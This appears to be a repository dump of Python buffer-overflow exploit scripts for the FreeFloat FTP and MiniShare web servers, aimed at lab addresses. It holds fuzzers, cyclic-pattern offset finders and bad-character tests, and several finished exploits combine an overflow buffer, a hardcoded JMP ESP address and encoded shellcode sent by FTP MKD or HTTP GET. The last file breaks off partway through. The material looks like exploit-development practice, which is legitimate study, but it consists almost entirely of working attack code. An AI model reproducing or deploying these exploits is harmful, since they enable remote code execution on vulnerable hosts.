evil="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | 6 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 7 | connect=s.connect(('11.11.11.6',21)) 8 | s.recv(1024) 9 | s.send('USER anonymous\r\n') 10 | s.recv(1024) 11 | s.send('PASS anonymous\r\n') 12 | s.recv(1024) 13 | s.send('MKD ' + evil + '\r\n') 14 | s.recv(1024) 15 | s.send('QUIT\r\n') 16 | s.close 17 | -------------------------------------------------------------------------------- /freefloatftp/ffftp3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | shellcode = ("\xfd\x4a\x4a\x90\x98\x27\x4b\x27\xd6\x41\x98\x2f\x49\x43\x9f" 5 | "\x92\x37\x49\x48\x2f\xd6\x49\xd6\x9b\xfd\xf8\x42\x93\x2f\x90" 6 | "\xd9\xc2\xd9\x74\x24\xf4\x5e\xb8\x80\x24\x86\x9d\x33\xc9\xb1" 7 | "\x53\x83\xc6\x04\x31\x46\x13\x03\xc6\x37\x64\x68\x3a\xdf\xea" 8 | "\x93\xc2\x20\x8b\x1a\x27\x11\x8b\x79\x2c\x02\x3b\x09\x60\xaf" 9 | "\xb0\x5f\x90\x24\xb4\x77\x97\x8d\x73\xae\x96\x0e\x2f\x92\xb9" 10 | "\x8c\x32\xc7\x19\xac\xfc\x1a\x58\xe9\xe1\xd7\x08\xa2\x6e\x45" 11 | "\xbc\xc7\x3b\x56\x37\x9b\xaa\xde\xa4\x6c\xcc\xcf\x7b\xe6\x97" 12 | "\xcf\x7a\x2b\xac\x59\x64\x28\x89\x10\x1f\x9a\x65\xa3\xc9\xd2" 13 | "\x86\x08\x34\xdb\x74\x50\x71\xdc\x66\x27\x8b\x1e\x1a\x30\x48" 14 | "\x5c\xc0\xb5\x4a\xc6\x83\x6e\xb6\xf6\x40\xe8\x3d\xf4\x2d\x7e" 15 | "\x19\x19\xb3\x53\x12\x25\x38\x52\xf4\xaf\x7a\x71\xd0\xf4\xd9" 16 | "\x18\x41\x51\x8f\x25\x91\x3a\x70\x80\xda\xd7\x65\xb9\x81\xbf" 17 | "\x4a\xf0\x39\x40\xc5\x83\x4a\x72\x4a\x38\xc4\x3e\x03\xe6\x13" 18 | "\x40\x3e\x5e\x8b\xbf\xc1\x9f\x82\x7b\x95\xcf\xbc\xaa\x96\x9b" 19 | "\x3c\x52\x43\x31\x34\xf5\x3c\x24\xb9\x45\xed\xe8\x11\x2e\xe7" 20 | "\xe6\x4e\x4e\x08\x2d\xe7\xe7\xf5\xce\x16\xa4\x70\x28\x72\x44" 21 | "\xd5\xe2\xea\xa6\x02\x3b\x8d\xd9\x60\x13\x39\x91\x62\xa4\x46" 22 | "\x22\xa1\x82\xd0\xa9\xa6\x16\xc1\xad\xe2\x3e\x96\x3a\x78\xaf" 23 | "\xd5\xdb\x7d\xfa\x8d\x78\xef\x61\x4d\xf6\x0c\x3e\x1a\x5f\xe2" 24 | "\x37\xce\x4d\x5d\xee\xec\x8f\x3b\xc9\xb4\x4b\xf8\xd4\x35\x19" 25 | "\x44\xf3\x25\xe7\x45\xbf\x11\xb7\x13\x69\xcf\x71\xca\xdb\xb9" 26 | "\x2b\xa1\xb5\x2d\xad\x89\x05\x2b\xb2\xc7\xf3\xd3\x03\xbe\x45" 27 | "\xec\xac\x56\x42\x95\xd0\xc6\xad\x4c\x51\xf6\xe7\xcc\xf0\x9f" 28 | "\xa1\x85\x40\xc2\x51\x70\x86\xfb\xd1\x70\x77\xf8\xca\xf1\x72" 29 | "\x44\x4d\xea\x0e\xd5\x38\x0c\xbc\xd6\x68") 30 | 31 | evil = "A"*247 + "\x53\x93\x42\x7e" +shellcode + "C"*(749-len(shellcode)) 32 | #the address of jmp esp is 0x7e429353 33 | #evil = "A" * 247 + "B"*4 + "C"*749 34 | #evil="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 35 | 36 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 37 | connect=s.connect(('11.11.11.6',21)) 38 | s.recv(1024) 39 | s.send('USER anonymous\r\n') 40 | s.recv(1024) 41 | s.send('PASS anonymous\r\n') 42 | s.recv(1024) 43 | s.send('MKD ' + evil + '\r\n') 44 | s.recv(1024) 45 | s.send('QUIT\r\n') 46 | s.close 47 | -------------------------------------------------------------------------------- /minishare/minisharefive.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buf="GET " 6 | buf+="A"*1787 7 | buf+="\x53\x93\x42\x7e" 8 | #memory address of jmp esp is 7e429353 9 | buf+="\x90"*20 10 | buf+=("\xd9\xe1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\xbf\x48" 11 | "\x44\xaf\x52\x83\xc6\x04\x31\x7e\x13\x03\x36\x57\x4d" 12 | "\xa7\x3a\xbf\x13\x48\xc2\x40\x74\xc0\x27\x71\xb4\xb6" 13 | "\x2c\x22\x04\xbc\x60\xcf\xef\x90\x90\x44\x9d\x3c\x97" 14 | "\xed\x28\x1b\x96\xee\x01\x5f\xb9\x6c\x58\x8c\x19\x4c" 15 | "\x93\xc1\x58\x89\xce\x28\x08\x42\x84\x9f\xbc\xe7\xd0" 16 | "\x23\x37\xbb\xf5\x23\xa4\x0c\xf7\x02\x7b\x06\xae\x84" 17 | "\x7a\xcb\xda\x8c\x64\x08\xe6\x47\x1f\xfa\x9c\x59\xc9" 18 | "\x32\x5c\xf5\x34\xfb\xaf\x07\x71\x3c\x50\x72\x8b\x3e" 19 | "\xed\x85\x48\x3c\x29\x03\x4a\xe6\xba\xb3\xb6\x16\x6e" 20 | "\x25\x3d\x14\xdb\x21\x19\x39\xda\xe6\x12\x45\x57\x09" 21 | "\xf4\xcf\x23\x2e\xd0\x94\xf0\x4f\x41\x71\x56\x6f\x91" 22 | "\xda\x07\xd5\xda\xf7\x5c\x64\x81\x9f\x91\x45\x39\x60" 23 | "\xbe\xde\x4a\x52\x61\x75\xc4\xde\xea\x53\x13\x20\xc1" 24 | "\x24\x8b\xdf\xea\x54\x82\x1b\xbe\x04\xbc\x8a\xbf\xce" 25 | "\x3c\x32\x6a\x7a\x34\x95\xc5\x99\xb9\x65\xb6\x1d\x11" 26 | "\x0e\xdc\x91\x4e\x2e\xdf\x7b\xe7\xc7\x22\x84\x16\x44" 27 | "\xaa\x62\x72\x64\xfa\x3d\xea\x46\xd9\xf5\x8d\xb9\x0b" 28 | "\xae\x39\xf1\x5d\x69\x46\x02\x48\xdd\xd0\x89\x9f\xd9" 29 | "\xc1\x8d\xb5\x49\x96\x1a\x43\x18\xd5\xbb\x54\x31\x8d" 30 | "\x58\xc6\xde\x4d\x16\xfb\x48\x1a\x7f\xcd\x80\xce\x6d" 31 | "\x74\x3b\xec\x6f\xe0\x04\xb4\xab\xd1\x8b\x35\x39\x6d" 32 | "\xa8\x25\x87\x6e\xf4\x11\x57\x39\xa2\xcf\x11\x93\x04" 33 | "\xb9\xcb\x48\xcf\x2d\x8d\xa2\xd0\x2b\x92\xee\xa6\xd3" 34 | "\x23\x47\xff\xec\x8c\x0f\xf7\x95\xf0\xaf\xf8\x4c\xb1" 35 | "\xc0\xb2\xcc\x90\x48\x1b\x85\xa0\x14\x9c\x70\xe6\x20" 36 | "\x1f\x70\x97\xd6\x3f\xf1\x92\x93\x87\xea\xee\x8c\x6d" 37 | "\x0c\x5c\xac\xa7") 38 | 39 | buf+=" HTTP/1.1\r\n\r\n" 40 | s.send(buf) 41 | s.close() 42 | -------------------------------------------------------------------------------- /minishare/minisharefour.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buf="GET " 6 | buf+="A"*1787 7 | buf+="\x53\x93\x42\x7e" 8 | #memory address of jmp esp is 7e429353 9 | buf+="\x90"*20 10 | buf+=("\xd9\xe1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\xbf\x48" 11 | "\x44\xaf\x52\x83\xc6\x04\x31\x7e\x13\x03\x36\x57\x4d" 12 | "\xa7\x3a\xbf\x13\x48\xc2\x40\x74\xc0\x27\x71\xb4\xb6" 13 | "\x2c\x22\x04\xbc\x60\xcf\xef\x90\x90\x44\x9d\x3c\x97" 14 | "\xed\x28\x1b\x96\xee\x01\x5f\xb9\x6c\x58\x8c\x19\x4c" 15 | "\x93\xc1\x58\x89\xce\x28\x08\x42\x84\x9f\xbc\xe7\xd0" 16 | "\x23\x37\xbb\xf5\x23\xa4\x0c\xf7\x02\x7b\x06\xae\x84" 17 | "\x7a\xcb\xda\x8c\x64\x08\xe6\x47\x1f\xfa\x9c\x59\xc9" 18 | "\x32\x5c\xf5\x34\xfb\xaf\x07\x71\x3c\x50\x72\x8b\x3e" 19 | "\xed\x85\x48\x3c\x29\x03\x4a\xe6\xba\xb3\xb6\x16\x6e" 20 | "\x25\x3d\x14\xdb\x21\x19\x39\xda\xe6\x12\x45\x57\x09" 21 | "\xf4\xcf\x23\x2e\xd0\x94\xf0\x4f\x41\x71\x56\x6f\x91" 22 | "\xda\x07\xd5\xda\xf7\x5c\x64\x81\x9f\x91\x45\x39\x60" 23 | "\xbe\xde\x4a\x52\x61\x75\xc4\xde\xea\x53\x13\x20\xc1" 24 | "\x24\x8b\xdf\xea\x54\x82\x1b\xbe\x04\xbc\x8a\xbf\xce" 25 | "\x3c\x32\x6a\x7a\x34\x95\xc5\x99\xb9\x65\xb6\x1d\x11" 26 | "\x0e\xdc\x91\x4e\x2e\xdf\x7b\xe7\xc7\x22\x84\x16\x44" 27 | "\xaa\x62\x72\x64\xfa\x3d\xea\x46\xd9\xf5\x8d\xb9\x0b" 28 | "\xae\x39\xf1\x5d\x69\x46\x02\x48\xdd\xd0\x89\x9f\xd9" 29 | "\xc1\x8d\xb5\x49\x96\x1a\x43\x18\xd5\xbb\x54\x31\x8d" 30 | "\x58\xc6\xde\x4d\x16\xfb\x48\x1a\x7f\xcd\x80\xce\x6d" 31 | "\x74\x3b\xec\x6f\xe0\x04\xb4\xab\xd1\x8b\x35\x39\x6d" 32 | "\xa8\x25\x87\x6e\xf4\x11\x57\x39\xa2\xcf\x11\x93\x04" 33 | "\xb9\xcb\x48\xcf\x2d\x8d\xa2\xd0\x2b\x92\xee\xa6\xd3" 34 | "\x23\x47\xff\xec\x8c\x0f\xf7\x95\xf0\xaf\xf8\x4c\xb1" 35 | "\xc0\xb2\xcc\x90\x48\x1b\x85\xa0\x14\x9c\x70\xe6\x20" 36 | "\x1f\x70\x97\xd6\x3f\xf1\x92\x93\x87\xea\xee\x8c\x6d" 37 | "\x0c\x5c\xac\xa7") 38 | 39 | buf+=" HTTP/1.1\r\n\r\n" 40 | s.send(buf) 41 | s.close() 42 | -------------------------------------------------------------------------------- /minishare/minishareone.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | buff+="A"*2000 7 | buff+=" HTTP/1.1\r\n\r\n" 8 | s.send(buff) 9 | s.close() 10 | -------------------------------------------------------------------------------- /minishare/minisharethree.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | buff+="A"*1787 7 | buff+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 8 | buff+="\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | buff+="\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | buff+="\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | buff+="\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | buff+="\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | buff+="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | buff+="\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | buff+="\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | buff+="\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | buff+="\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | buff+="\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | buff+="\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | buff+="\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | buff+="\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | buff+="\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | buff+=" HTTP/1.1\r\n\r\n" 24 | s.send(buff) 25 | s.close() 26 | -------------------------------------------------------------------------------- /minishare/minisharetwo.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 7 | buff+=" HTTP/1.1\r\n\r\n" 8 | s.send(buff) 9 | s.close() 10 | -------------------------------------------------------------------------------- /minisharewin7/fuzzer.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/share/python 3 | import socket,sys 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | s.connect(('11.11.11.7',80)) 6 | buff="GET " 7 | buff+="A"*2000 8 | buff+=" HTTP/1.1\r\n\r\n" 9 | s.send(buff) 10 | s.close() 11 | -------------------------------------------------------------------------------- /minisharewin7/minishare.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/share/python 3 | import socket,sys 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | s.connect(('11.11.11.7',80)) 6 | buff="GET " 7 | buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 8 | buff+=" HTTP/1.1\r\n\r\n" 9 | s.send(buff) 10 | s.close() 11 | -------------------------------------------------------------------------------- /minisharewin7/minisharebadchars.py: -------------------------------------------------------------------------------- 1 | ] 2 | #!/usr/share/python 3 | import socket,sys 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | 